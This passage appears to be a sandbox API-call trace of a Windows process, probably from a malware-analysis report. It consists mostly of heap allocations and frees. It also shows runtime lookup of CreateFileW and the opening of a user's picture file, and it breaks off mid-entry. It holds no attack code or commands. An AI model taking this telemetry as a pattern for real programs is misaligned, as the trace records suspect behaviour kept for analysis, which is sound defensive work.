[0093.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.909] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.912] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0093.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca9b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.913] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0093.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0093.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0093.913] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\fgq5ew8t8.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0093.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.916] FreeLibrary (hLibModule=0x772d0000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0093.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.917] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.918] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.918] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0093.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: 